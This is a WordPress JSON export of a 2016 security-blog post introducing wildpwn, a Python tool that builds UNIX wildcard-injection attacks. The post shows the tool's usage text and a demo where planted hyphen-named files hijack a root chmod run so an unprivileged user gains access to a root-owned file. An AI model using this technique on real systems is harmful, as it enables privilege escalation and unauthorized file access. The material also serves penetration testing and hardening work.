{"id":4130,"date":"2016-05-27T23:56:01","date_gmt":"2016-05-27T15:56:01","guid":{"rendered":"https:\/\/www.darknet.org.uk\/?p=4130"},"modified":"2016-05-06T02:56:42","modified_gmt":"2016-05-05T18:56:42","slug":"wildpwn-unix-wildcard-attack-tool","status":"publish","type":"post","link":"https:\/\/www.darknet.org.uk\/2016\/05\/wildpwn-unix-wildcard-attack-tool\/","title":{"rendered":"wildpwn – UNIX Wildcard Attack Tool"},"content":{"rendered":"
wildpwn is a Python UNIX wildcard attack tool that helps you generate attacks, based on a paper by Leon Juranic. It’s considered a fairly old-skool attack vector, but it still works quite often.<\/p>\n
<\/p>\n
The simple trick behind this technique is that when using shell wildcards, especially asterisk (*), the UNIX shell will interpret files beginning with a hyphen (-) character as command line argument to be executed by the command\/program. That leaves space for some variations of the classic channelling attack.<\/p>\n
The practical case in terms of this technique is combining arguments and filenames, as different “channels” into single entity, because of using shell wildcards.<\/p>\n
Read the full paper here: Back To The Future: Unix Wildcards Gone Wild<\/a><\/p>\n You can download wildpwn here:<\/p>\nUsage<\/h3>\n
usage: wildpwn.py [-h] [--file FILE] payload folder\r\n\r\nTool to generate unix wildcard attacks\r\n\r\npositional arguments:\r\n payload Payload to use: (combined | tar | rsync)\r\n folder Where to write the payloads\r\n\r\noptional arguments:\r\n -h, --help show this help message and exit\r\n --file FILE Path to file for taking ownership \/ change permissions. Use it\r\n with combined attack only.<\/pre>\n
Usage Example<\/h3>\n
$ ls -lh \/tmp\/very_secret_file\r\n-rw-r--r-- 1 root root 2048 jun 28 21:37 \/tmp\/very_secret_file\r\n\r\n$ ls -lh .\/pwn_me\/\r\ndrwxrwxrwx 2 root root 4,0K jun 28 21:38 .\r\n[...]\r\n-rw-rw-r-- 1 root root 1024 jun 28 21:38 secret_file_1\r\n-rw-rw-r-- 1 root root 1024 jun 28 21:38 secret_file_2\r\n[...]\r\n\r\n$ python wildpwn.py --file \/tmp\/very_secret_file combined .\/pwn_me\/\r\n[!] Selected payload: combined\r\n[+] Done! Now wait for something like: chown uid:gid * (or) chmod [perms] * on .\/pwn_me\/. Good luck!\r\n\r\n[...time passes \/ some cron gets executed...]\r\n\r\n# chmod 000 * (for example)\r\n\r\n[...back with the unprivileged user...]\r\n\r\n$ ls -lha .\/pwn_me\/\r\n[...]\r\n-rwxrwxrwx 1 root root 1024 jun 28 21:38 secret_file_1\r\n-rwxrwxrwx 1 root root 1024 jun 28 21:38 secret_file_2\r\n[...]\r\n\r\n$ ls -lha \/tmp\/very_secret_file\r\n-rwxrwxrwx 1 root root 2048 jun 28 21:38 \/tmp\/very_secret_file<\/pre>\n